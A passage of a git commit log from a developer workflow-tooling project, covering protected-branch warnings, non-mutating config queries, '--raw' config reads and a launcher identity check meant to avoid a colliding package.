The workflow bash stub now emits a stderr diagnostic the way the real
command does, which is what makes a swallowed `2>/dev/null` visible to a
test — previously the stub was silent on stderr, so discarding it changed
no observable behaviour and the call sites could drop the explanation
undetected.

Adds the Minor 2 binding check as well: ship must expose the predicate
result as IS_PROTECTED rather than only echoing a warning, asserted by
running the extracted bash and reading the bound value, not by grepping
the workflow source.

Both tests carry opposite-outcome controls — an empty diagnostic must
leave the text absent, and a false predicate must bind false.

* fix(#3648): surface the predicate diagnostic and bind ship's result

Drop `2>/dev/null` from the --is-protected call at both call sites. The
fail-closed explanation and the new rejected-entry warning both go to
stderr, so discarding it left the user with a bare "protected branch"
warning on a branch that is not protected and no way to tell a real
match from a degraded-git guess. `git branch --show-current` keeps its
own redirect — that one is genuine noise.

ship.md binds IS_PROTECTED and its prose now branches on the variable,
so the following steps have evaluable state instead of having to infer
it from warning text in tool output.

execute-phase.md byte accounting refreshed: 92326 -> 92645, net growth
319 bytes (was 331 before the redirect came out). Baseline re-verified
against the current rebase base by blob id; the ceiling check passes
with 755 bytes of margin.

* test(#3648): restore negative space for the readFile config seam

The #3057 W3 suite was deleted with readConfigBaseBranch, but every arm
it pinned survives verbatim in readEffectiveGitConfig's readFile branch —
the JSON.parse catch, the non-object guard, the git-section object guard,
.trim() and blank-string rejection — and the four surviving readFile
injections were positive-path only. protected_branches was never driven
through this seam at all.

Restores nine cases against the seam, including protected_branches
partitioning, plus a control proving loadConfig still wins when both
seams are supplied.

Records honestly what the suite pins. Mutating the built lib shows
.trim() is KILLED, while the non-object guard and the blank-string
rejection SURVIVE — both are unreachable through this entry point for
the same reasons the deleted suite documented against its own
equivalents: a JSON-parsed non-object carries no relevant own-property
either way, and a blank value is rejected a second time downstream by
the resolver's truthiness check. They stay as defence-in-depth and are
labelled known-unkillable rather than left looking like coverage this
suite does not provide.

* test(#3648): distinguish detached HEAD from a missing branch argument

`args[1] ?? ''` collapsed two different situations into one: a detached
HEAD, where `git branch --show-current` legitimately prints nothing, and
the flag being called with no argument at all. Both answered false, so
the right outcome arrived by an unintentional path and a caller bug was
indistinguishable from normal operation.

Asserts the detached case stays silent and the missing-argument case
reports, with a control that the two diagnostics differ.

* fix(#3648): report a missing --is-protected branch argument

Answer false either way, but say so when the flag arrives with no
argument. A detached HEAD passes an explicit empty string and stays
silent, since that is a normal state rather than a misconfiguration.

* docs(#3648): state exact-name matching and per-entry rejection

isProtected is exact string equality, so a git-flow project must
enumerate every release/* and hotfix/* by name. #3552 only asked for an
integration-branch field, so the implementation satisfies the letter of
the issue while leaving its git-flow motivation partly unserved — say so
where users will meet it rather than leaving them to discover it.

Also documents the Blocker 3 behaviour change: an invalid entry is
ignored with a warning naming it and the remaining names still apply.

Both statements land in docs/CONFIGURATION.md and
gsd-core/references/planning-config.md, and the config-field-docs parity
test asserts each in both so the two cannot drift.

* refactor(#3648): extract isValidProtectedBranches for cross-surface pinning

The `git.protected_branches` check inside `cmdConfigSet` and the resolver's
per-entry filter in `git-base-branch.cts` are deliberately different shapes —
all-or-nothing on write, per-entry on read, so a hand-edited config.json cannot
fail the guard open. Nothing structural keeps their two definitions of "usable
branch name" in step.

Lifting the write-side check into a named, exported predicate lets a property
test ask both surfaces about the same value and assert they agree, which is the
fast-check gap the round-2 review flagged. No behaviour change: the predicate is
the same expression, called from the same place.

* fix(#3648): stop --is-protected rewriting the config it is asking about

`gsd_run query git.base-branch --is-protected` runs on every execute-phase and
every ship. It resolved config through `loadConfig`, whose normalize-then-write
path rewrites `.planning/config.json` whenever any legacy key normalizes — so a
boolean question was silently editing the user's checked-in config. This PR had
widened the trigger by adding a fifth normalization block (top-level
`base_branch` -> `git.base_branch`), making it fire for exactly the projects the
feature targets.

`loadConfigResolved` gains `options.persist` (opt-OUT, default true): resolution
is unchanged, only the two write-back side effects are suppressed. The predicate
passes `persist: false`; the ~30 other callers are untouched, so a legacy config
is still migrated by ordinary use.

Asserted on BYTES rather than parsed shape, because the rewrite reorders keys and
reflows whitespace even when the values are equivalent. Three tests, each with
its own control: the end-to-end CLI leaves the file byte-identical while still
answering `true` from the legacy key (proving the config WAS read); an ordinary
persisting load of the same fixture DOES change the bytes (proving the fixture
is live rather than inert); and `persist:false` vs default over one directory
returns deep-equal config while differing on the write. Reverting the one-line
`persist: false` fails the first of those and only that one.

Also from the review:

- `readEffectiveGitConfig`'s comment claimed the readFile branch routed "through
  the same precedence authority production uses". It does not, and cannot — it
  reproduces two of production's steps over a single file. The comment now names
  what the seam covers and what it does NOT (root/workstream deep merge, builtin
  and global defaults, federated merge), and the seam now applies production's
  flat-then-nested lookup so it stops disagreeing about a surviving flat key.

- The missing-argument diagnostic promised "answering false", which the
  fail-closed guard on the same call can contradict by printing `true`. It now
  states what it did with the argument and leaves the answer to stdout.

* test(#3648): re-pin block 5 on #3760's refusal contract

#3767 landed on next while this PR was in review and fixed the non-object
config-section defect properly: a present-but-non-object section now BLOCKS its
own migration — value preserved, no Normalization pushed, refusal reported via
`skipped[]` — rather than being rebuilt from a plain-object view. That supersedes
this branch's round-2 `hoistLegacyKey`, which prevented the character-key spread
but still dropped the section value silently, and which the round-3 review
correctly called out as destruction in place of corruption. The rebase drops that
commit and routes block 5 through the upstream helper.

This file's tests asserted the superseded design, so they are rewritten to pin
block 5 — `base_branch` -> `git.base_branch`, which did not exist when #3760's
suite was written — against the contract that now governs it: ordinary hoist into
an absent/null/object section, canonical-nested-wins, and refusal for each of
string/number/boolean/array sections with the exact `skipped` entry.

Two controls keep it from passing vacuously: the refusal must be scoped to block
5 (an unrelated block still normalizes in the same call), and a property over
arbitrary `git` values asserts hoist and refusal are exhaustive AND mutually
exclusive per key, that a refusal leaves both the section and the legacy key
untouched, and that a hoist manufactures no index key the input did not carry.

* docs(#3648): correct the Git Query and Config Loader module contracts

CONTEXT.md's Git Query Module still described base-branch tier 1 as a direct
`.planning/config.json` read. Since this PR it is the EFFECTIVE configuration
resolved by the Config Loader — a materially different authority, carrying the
root/workstream deep merge, flat-then-nested lookup and builtin/federated
defaults. The `--is-protected` predicate, `git.protected_branches`, and the two
invariants that distinguish the predicate from the plain query (fails closed on
an unverified base; must not write) were undocumented entirely.

The Config Loader entry now states that loading is not side-effect-free by
default and documents `options.persist`.

docs/INVENTORY.md's `git-base-branch.cjs` row carried the same stale ladder and
no mention of the predicate. `node scripts/gen-inventory-manifest.cjs --write`
was run and produced no diff: the manifest indexes roster NAMES, not row prose,
so a description edit cannot move it.

Also closes the global-defaults minor: `git.protected_branches` is inert in
`~/.gsd/defaults.json`, but so is every other `git.*` key — no branch-policy key
appears in `_globalBaseCfg` or `GLOBAL_DEFAULTS_RESOLUTION_KEYS`. That is
section-wide and predates this PR, so the fix is to state the scope where users
meet it rather than to quietly extend the resolution set for two new keys.

* fix(#3648): close four defects found by the round-4 external review

Two external reviewers (codex, antigravity/Gemini 3.1 Pro) were run adversarially
against this branch. Four findings reproduced against source; each is fixed with a
failing-first test and a control, and each fix was verified by reverting it and
watching exactly the intended test fail.

1. `persist:false` was DROPPED by the workstream fallback (codex). Blocker 1 was
   only half closed. `loadConfigResolved` re-enters itself with a bare
   `{ workstream: null }` when a workstream has no config.json of its own, and
   that literal discarded every other option — so the recursive pass ran at the
   DEFAULT persistence and rewrote the ROOT config. Reproduced: with
   GSD_WORKSTREAM=alpha and a legacy flat `base_branch`, `--is-protected`
   rewrote `.planning/config.json` despite `persist:false`. Both recursions now
   forward `options` and override only `workstream`; the explicit override still
   wins the hasOwnProperty check, so spreading cannot let `workstreamContext`
   reintroduce a workstream.

2. Both workflow call sites failed OPEN, and aborted under `set -e` (both
   reviewers, independently). `IS_PROTECTED=$(gsd_run ...)` yields an empty
   string when the query fails, so `[ "$X" = true ]` was simply false: no
   warning, no trace — a silent hole in the guard whose only job is to warn. The
   bare assignment also aborted the step under `set -e`. Both sites now degrade
   VISIBLY: `|| IS_PROTECTED=""`, then an explicit empty-string arm that says the
   check did not run. Deliberately not fail-closed — claiming "protected" on no
   evidence would warn on every branch whenever gsd-tools is unavailable.

3. `isValidProtectedBranches` and the resolver disagreed on a sparse array
   (antigravity). `.every()` skips holes; the resolver's `for...of` yields
   `undefined` for them, so `["main", , "develop"]` was accepted by config-set
   and rejected by the resolver. The cross-surface property passed only because
   `fc.array` cannot generate a hole. The predicate now indexes, and the
   generator punches holes so that axis is actually falsifiable. JSON cannot
   express a hole, so this is unreachable in production — but two definitions of
   one predicate must not contradict each other.

4. A top-level `protected_branches` silently outranked `git.protected_branches`
   (antigravity). Routing the key through `get(key, {section, field})` gave it
   flat-then-nested precedence, which is back-compat for keys
   `normalizeLegacyKeys` migrates. `protected_branches` is new in #3552 and has
   no legacy form, so that invented an undocumented alias. It now resolves
   nested-only through a new `getNested`, in production and in the test seam.
   `base_branch` keeps flat-then-nested — it HAS a legacy spelling that #3760's
   refusal path can leave behind — and a control pins that distinction.

Also narrows a CONTEXT.md claim this round introduced. The predicate fails closed
only when a git query TIMED OUT or could not be spawned (#3057 B4's `verified`);
a git command that runs and exits non-zero counts as a clean negative, so a cwd
that is not a repository answers `false`, not `true`. Verified pre-existing on
next @ 738f42f4, so the documentation was over-claiming rather than the code
regressing — but an over-broad contract is exactly what the module docs must not
carry.

Both workflow byte figures re-derived after the call-site change:
execute-phase.md 92356 -> 92865 (+509), ship.md 36784 -> 37227 (+443).

* test(#3648): pin git config read parity

* docs(#3648): document git query contracts

* fix(#3648): expose protected branch default

* test(#3648): snapshot planning tree for read-only query

* test(#3648): pin planning snapshot stray-write detection

* fix(#3648): resolve merge conflict from #3078's ack-fragment sweep

next swept the fully-spent 2818/3003 ack fragments this branch had
appended to (#3078, a84f7563). Rebased onto upstream/next and took
the deletions on both, then moved the #3552 append into a new
fragment of its own.

Rebasing onto the current base also left execute-phase.md only 34
bytes under the frozen ADR-857 Phase 6 margin ceiling (93400 bytes) —
intervening next PRs consumed the rest while this PR was in review.
Extracted the "none" arm's protected-branch-warning bash block into
gsd-core/workflows/execute-phase/steps/protected-branch.md (content
unchanged, matching the existing steps/ extraction pattern used
elsewhere in this file) so the inline growth is a one-line pointer
instead of the full block. 93366 -> 93385 bytes (+19), 15 bytes
inside the ceiling.

* fix(#3648): drop stale ack entry for the new step file

The extracted execute-phase/steps/protected-branch.md needed no
acknowledgment of its own — the differential-attribution check flagged
the entry as stale once the build ran, so removed it and kept the two
growth entries (execute-phase.md, ship.md) that actually needed one.

* fix(#3648): follow the step-file reference in the bash-extraction test helper

extractProtectedBranchWarningBash() read the "none" arm's bash block
directly out of execute-phase.md. That block now lives in
execute-phase/steps/protected-branch.md (byte-ceiling extraction);
the helper follows the step-file reference and extracts from there
when no inline block is found, so the three execute-phase tests that
execute this bash for real keep exercising the actual behavior.

* fix(#3648): regenerate INVENTORY-MANIFEST.json and satisfy the CRLF-fragile lint rule

- gen-inventory-manifest.cjs --write to pick up the new
  execute-phase/steps/protected-branch.md entry (already covered by
  docs/INVENTORY.md's generic workflow_steps wildcard row, so no
  INVENTORY.md edit is needed).
- Reworked the step-file-reference lookup in
  extractProtectedBranchWarningBash() to avoid a bare-\n regex split
  on file content (local/no-crlf-fragile-split), using the same
  line-array scan the function already uses elsewhere.

* fix(#3648): regenerate golden install-tree fixtures for the new step file

npm run gen:install-tree, adding gsd-core/workflows/execute-phase/
steps/protected-branch.md to all 19 runtime install-tree fixtures.
CI's tests/golden-install-tree.test.cjs caught this on push — I'd
verified the differential-attribution and INVENTORY-MANIFEST checks
but missed this separate golden-fixture check for the new file.

* fix(#3648): add the canonical gsd_run preamble to the new step file

CI's runtime-launcher-parity suite requires exactly one canonical
resolver preamble in every workflow .md that calls gsd_run. The
inline "none"-arm block never needed one (execute-phase.md already
carried a preamble elsewhere in the same file), but the extracted
execute-phase/steps/protected-branch.md is now its own file with no
preamble of its own. Ran node scripts/sync-runtime-launcher.cjs to
insert it (execute-phase.md itself is untouched — still 93385 bytes,
inside the ADR-857 ceiling).

That preamble defines its own gsd_run(), which shadows the mock
tests/git-base-branch.test.cjs injects for the three #3648 tests that
execute this bash for real — without stripping it, those tests reached
the real gsd-tools.cjs on the machine running them instead of the
test's fixture. Preamble correctness is already covered by
tests/runtime-launcher-parity.test.cjs, so extractProtectedBranchWarningBash()
now strips the preamble line before handing the block to the harness;
it only needs to exercise the #3552 warning logic.

* fix(#3552): address PR 3648 review feedback on protected branch warnings

- Fix execute-phase handle_branching branching_strategy=none instruction
  to "Read and execute execute-phase/steps/protected-branch.md"
- Use io.error(..., ERROR_REASON.USAGE) for cmdGitBaseBranch usage errors
- Align git.protected_branches schema default to (none) without fallback []
- Relocate CONTEXT.md forward-referencing sentence into module body
- Sanitize control and ANSI characters in renderRejected diagnostics
- Clean up out-of-scope whitespace hunks in gsd-tools.cjs

Emitted-Drift-Ack-Growth: execute-phase.md — #3552: execute-phase handle_branching adds a pointer to execute-phase/steps/protected-branch.md for branching_strategy=none so the protected-branch check executes while keeping execute-phase.md within the ADR-857 Phase 6 margin ceiling (93400 bytes). 93392 bytes, 8 bytes inside the ceiling.
Emitted-Drift-Ack-Growth: ship.md — #3552: ship preflight step 3 now asks the same typed git.base-branch --is-protected predicate as execute-phase, binding IS_PROTECTED and warning without refusing execution or blocking the branching_strategy=none feature-branch offer; it degrades visibly (rather than silently reading an empty result as "not protected") when the query itself fails to run. 36841 bytes, well inside the XL cap (98304, tests/workflow-size-budget.test.cjs).

---------

Co-authored-by: Claude Sonnet 5 <noreply@anthropic.com>
Co-authored-by: Tom Boucher <trekkie@nomorestars.com>
2026-08-29 17:00:52 -04:00
Tom Boucher
52b11ee811 fix(#3763): pass --raw at every shipped config-get bash call site (#3961)
* test(#3763): guard every shipped config-get substitution on --raw

* fix(#3763): pass --raw at every shipped config-get bash call site

config-get without --raw prints JSON.stringify(value), so string-typed values
reach bash with literal quotes and every string comparison silently never
matches (#3763). --raw added at 75 command-substitution sites across shipped
content; four JSON consumers (default_reviewers, sub_repos, pr_body_sections,
code_review_depth_overrides) deliberately keep default JSON output.

Emitted-Drift-Ack-Growth: ai-integration-phase.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: audit-fix.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: autonomous.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: cleanup.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: code-review.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: complete-milestone.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: discuss-phase-assumptions.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: do.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: eval-review.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: execute-phase.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: execute-plan.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: fast.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: graduation.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: gsd-executor.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: health.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: import.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: inbox.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: ingest-docs.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: mvp-phase.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: new-milestone.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: next.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: plan-phase.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: plan-review-convergence.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: plant-seed.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: profile-user.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: progress.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: quick.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: remove-workspace.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: secure-phase.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: settings-integrations.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: settings.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: ship.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: sketch-wrap-up.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: sketch.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: smart-entry.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: spike-wrap-up.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: spike.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: ui-phase.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: ui-review.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: undo.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted
Emitted-Drift-Ack-Growth: validate-phase.md — #3763: bytes from '--raw' at config-get call sites so string-typed config values reach bash comparisons unquoted

* chore(#3763): changeset fragment (pr number backfilled after PR creation)

* chore(#3763): backfill changeset PR number (3961)

---------

Co-authored-by: sim <sim@local>
2026-08-27 19:55:34 -04:00
Tom Boucher
fb2d122d7f feat(#3841): assert gsd-tools identity on every state-mutating verb (#3848)
* feat(#3841): assert gsd-tools identity before any state-mutating verb

only this package publishes. The path-based branches — a project-local install,
a runtime config directory — had no such guarantee; they trusted their
configured location. This closes them.

Mechanism: once resolution finishes, and before any verb runs, the preamble
probes the tool it picked with `runtime-identity --raw` and matches the answer
with a shell `case` pattern ANCHORED to the start of the compact payload
(`{"packageName":"@opengsd/gsd-core"`). An unanchored substring match accepts
the decoy `{"packageName":"get-shit-done-cc","note":"@opengsd/gsd-core"}`, which
any colliding package could publish. The outcome is exported as the two-valued
`GSD_IDENTITY_STATUS` (`ok`/`unverified`), so the gate is asserted on a VALUE
rather than on warning prose. Rollout is warn-then-fail per the #3146 ruling:
`unverified` prints one line naming BOTH causes and continues, because
`no_identity_verb` cannot tell a foreign package from an `@opengsd/gsd-core`
older than the verb, and at rollout the old-version case is the common one.

The blocker was byte budget, not design. The preamble is inlined into 112
shipped files and several sat within single-digit bytes of frozen ceilings
(`gsd-verifier.md` 16 bytes, `gsd-executor.md` 33, `execute-phase.md` 234); a
first attempt broke five of them. What made room was collapsing the resolver's
twenty near-identical `elif [ -f … ]` arms into one candidate-list helper
(`_gsd_at`), which buys far more than the assertion costs. The preamble is now
2,624 bytes against 4,500 — a net 1,876 bytes SMALLER per inlined file, so every
capped file moved away from its ceiling rather than toward it. No cap raised, no
size-budget exception added, no override token emitted.

Resolution order, every runtime-home probe, the `unset -f gsd_run` re-source
fix, the fail-closed `exit 1`, and the `CLAUDE_ENV_FILE` persistence are all
preserved byte-for-byte in substring terms; the snippet still begins with
`_GSD_SHIM_NAME=` and still ends with `fi`, which the parity extractors anchor
on. `gsd-core/references/gsd-run-resolver.md` is re-synced byte-equal.

Also fixes two stale claims found in passing: CONTEXT.md and FEATURES.md both
described an `[ -x ]` guard as the load-bearing re-source defense. That guard
was tried and REMOVED in #3831 — it rejected the bare function name, fell
through every branch, and hit `exit 1`, which kills a sourced caller's shell.
`unset -f gsd_run` is the actual mechanism.

Refs #3841

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#3841): pair the anchor's brace by requiring a closed identity payload

The matrix went red on `tests/new-project-mvp-prompt.test.cjs` — "new-project.md
has unbalanced braces: net depth 2" — plus a knock-on report from its parent
`bug #1516` describe, which is the same failure counted once at the child and
once at the block.

Root cause: that guard (:182-189, mirroring #3784 bd53925f) walks characters and
increments on `{`, decrements on `}`, with no awareness of shell quoting. It
scans `new-project.md` PLUS every `new-project/steps/*.md`, and both
`new-project.md` and `steps/auto-mode-config.md` carry one inlined preamble copy
— hence net 2 from a snippet that was off by exactly one. The unpaired brace was
the `{` inside the single-quoted `case` pattern of the identity anchor, which is
correct shell and invisible to a text scanner.

Fix in the snippet, not the guard. The pattern now anchors at BOTH ends:
`'{"packageName":"@opengsd/gsd-core"'*'}'`. That balances 51/51 with a brace that
does real work rather than a cosmetic pair — a truncated payload whose prefix
matches now fails too, where before it verified. Safe for any future additive
field: a JSON object's own closing brace is always the last character, whatever
type the last value has, which is pinned by two negative-space tests (a nested
object and an array-valued last key must both still verify). Cost: +3 bytes,
against the 1,873 the resolver fold already gave back.

The alternative considered and rejected was dropping the literal `{` for a `?`
glob. It balances too, but weakens the anchor from "must be an opening brace" to
"must be any one character", and the anchor is the entire point.

Two guards added so this cannot recur silently:
- runtime-launcher-parity (F0) pins brace balance at the SNIPPET, so the next
  edit to that pattern fails on the file it broke instead of surfacing three
  files downstream in a test whose name mentions neither the launcher nor this
  issue. It also asserts depth never goes negative, since a `}` preceding its
  `{` nets to zero while being unbalanced at every prefix.
- runtime-identity gains behavioral truncated-payload and trailing-garbage
  fixtures, so the added `}` is proven load-bearing rather than merely present.

Verified: snippet 51/51 braces; new-project combined net depth 0; the seven
other preamble-bearing files with nonzero depth are unchanged from merged next
(their own prose, not the preamble, and not in any guard's scan set); all 112
inlined copies and the resolver reference re-synced byte-equal; sync:launcher
idempotent on the second run.

Refs #3841

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#3841): backfill changeset PR number

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
2026-08-25 01:05:53 -04:00
Tom Boucher
63abcface9 feat(#3146): resolve gsd_run so workflows cannot reach a foreign gsd-tools (#3831)
* feat(#3146): resolve gsd_run so workflows cannot reach a foreign gsd-tools

The predecessor package get-shit-done-cc publishes a colliding gsd-tools bin whose phases.clear DELETES where this package's ARCHIVES, and both print success-shaped output against a gitignored .planning/ -- which is how #3129 cost a user 43 phase directories with no error and nothing recoverable from git.

The launcher's PATH branch now resolves gsd_run, published only by this package and self-locating via its own symlink chain to the sibling shim, instead of the colliding gsd-tools. A foreign handler becomes unreachable from PATH, and when no gsd_run is reachable the resolver fails closed rather than falling back -- that fallback was the vulnerability. This is smaller than the branch it replaces, which matters: the preamble is inlined into 113 shipped files and agents/gsd-verifier.md sits 2 bytes under a red-line size cap.

unset -f gsd_run leads the preamble so a re-source is idempotent. Without it, command -v finds the shell function, returns a bare name, and the resolver falls through to an exit 1 that kills a sourced caller's shell.

Adds gsd-tools runtime-identity, a manual diagnostic reporting this runtime's package coordinates over the baked package-identity (#498) and readHostVersion, with a strict total classifier: only a JSON object with an exact packageName verifies, since JSON.parse admits 0/"str"/[]/null/true.

An inlined identity assertion was built and reviewed first, then withdrawn -- it breaks five frozen size ceilings and no assertion fits in 2 bytes.

Closes #3146

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#3146): stop sync:launcher relocating a deliberate preamble placement

Pre-existing defect, surfaced by this PR because sync is a no-op unless the snippet content actually changes. transformFile inserts the preamble into the first block that CALLS gsd_run, but gsd-core/workflows/explore.md deliberately places it in a bootstrap-only block that DEFINES gsd_run without calling it -- its own comment explains why: declining the research offer must not leave Step 5's commit call unbootstrapped. Stripping empties that block of calls, so the preamble migrated forward and broke the define-before-use invariant tests/explore-command.test.cjs pins.

Reproduced on a pristine origin/next checkout with the base snippet and base file, so this was not introduced here. The insertion target now honours a block that already carried the preamble, falling back to the first calling block for files that have none yet. Adds a behavioral regression test over a two-block fixture.

Also updates three runtime-launcher-parity tests that pinned the removed PATH fallback to gsd-tools. Their intent is preserved -- the PATH stub is renamed gsd_run so it is reachable by the new resolver, and the RUNTIME_DIR-wins test still asserts the stub is never invoked. Fixture shebangs move to an absolute /bin/sh, because the fixture PATH is deliberately restricted and #!/usr/bin/env sh could not resolve.

Refs #3146

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* chore(#3146): backfill changeset PR number

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* docs(#3146): document the FEATURES.md section-numbering practice

The monotonically increasing section number in docs/FEATURES.md is the most frequent merge-conflict source in this repo, and it has TWO conflict cells, not one: the ### N. heading and the hand-maintained table of contents. Two PRs adding differently numbered features still collide on the TOC, so renumbering alone does not make a branch safe. This branch alone was renumbered 165 -> 166 -> 167 -> 168 across successive rebases.

Adds a CONTRIBUTING section stating the practice: allocate the number last, never pre-emptively renumber, take max+1 after a rebase and update the TOC in the same commit, and never renumber someone else's section. Fork contributors are told explicitly they may leave the number to a maintainer at merge rather than chasing the counter. Agents are told to lease the allocation and to include the file in their published touched set.

Records the durable fix as planned rather than pretending it exists: FEATURES.md should be generated from per-feature fragments the way CHANGELOG.md is generated from .changeset/, and the way tests/emitted-drift-acks/ works (#2914).

Also renumbers this branch's own section to 168, leaving 167 to the PR already in flight.

Refs #3146

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

---------

Co-authored-by: sim <sim@local>
Co-authored-by: Claude Opus 5 <noreply@anthropic.com>
2026-08-24 20:57:16 -04:00
Tom Boucher
8442d984b9 fix(#3809): route runtime-loaded markdown through the gsd_run launcher (#3815)
* test(#3809): generalize dead-ref guard into a rule table (failing first)

The #2020 guard hardcoded `sdk/(src|dist|handlers)/` — the three dead paths
that had caused that storm. That proved those three paths were gone and said
nothing about the class, so #3809 reproduced the identical Windows find.exe
storm under a different token and the guard could not see it.

Replaces the single regex with a rule table over the same runtime-loaded
markdown surface, adds `commands/` to the scan set (previously uncovered),
and adds rule B: the runtime shim filename must never appear in command
position, because it is not a PATH command and an agent that meets it falls
back to locating the file.

Rule B's matcher is deliberately lenient — the launcher's own resolver
assignment, `node <path>/<shim>` calls, bare paths, and prose that names the
file all stay unflagged, each pinned by a negative-space row.

This commit is expected to FAIL: 50 offenders across 23 files remain in the
tree. The remediation lands next.

Refs #3809

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#3809): route every workflow call through the gsd_run launcher

50 places across 23 runtime-loaded workflow, agent, reference, and command
files instructed the agent to run the runtime shim by filename. That filename
is not on PATH under any name -- package.json ships gsd-core, gsd-tools,
gsd_run and gsd-mcp-server -- so the call exited 127, the file-shaped token
sent the agent looking for the file, and on Git Bash for Windows the resulting
`find /` walked the entire drive (7268 CPU-seconds in the report) until
somebody killed it by hand.

CONTEXT.md -> Runtime Launcher Module already makes gsd_run the single entry
point: "Canonical space-safe shell preamble (`gsd_run`) used by every workflow
bash block to invoke the GSD runtime CLI." These sites predate that rule --
they trace to 0e6907050 (docs(#195): migrate workflow markdown off gsd-sdk
query), which swapped one non-PATH token for another.

Two further instances of the same class surfaced during remediation and are
fixed here rather than left for later:

  - references/model-profiles.md prescribed `node <shim> effort sync` with no
    path at all; node resolves a bare filename against cwd, so it fails the
    same way.
  - references/universal-anti-patterns.md rule 25 instructed every agent to
    "use <shim>" when shelling out. That rule did not contain the defect, it
    prescribed it repo-wide.

Five "(or legacy <shim>)" parentheticals left dangling by the substitution are
removed; after the rewrite they offered the non-resolving form as an
alternative.

The guard from the previous commit now passes. Its node-prefix exemption was
tightened to require a path separator, which is what exposed model-profiles.

Fixes #3809

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>

* fix(#3809): key the guard on the CLI's whole verb roster, not observed usage

Review found the first cut of rule B repeating the very mistake it exists to
prevent. Its verb set held query, commit and effort -- the verbs that happened
to appear in the tree -- so it could not see `<shim> phase add`,
`<shim> state load`, `<shim> verify ...` or twenty-odd other real single-word
subcommands. A guard that only recognises yesterday's offenders is not a guard.

The set is now the CLI's full advertised roster, unioned from the usage banner
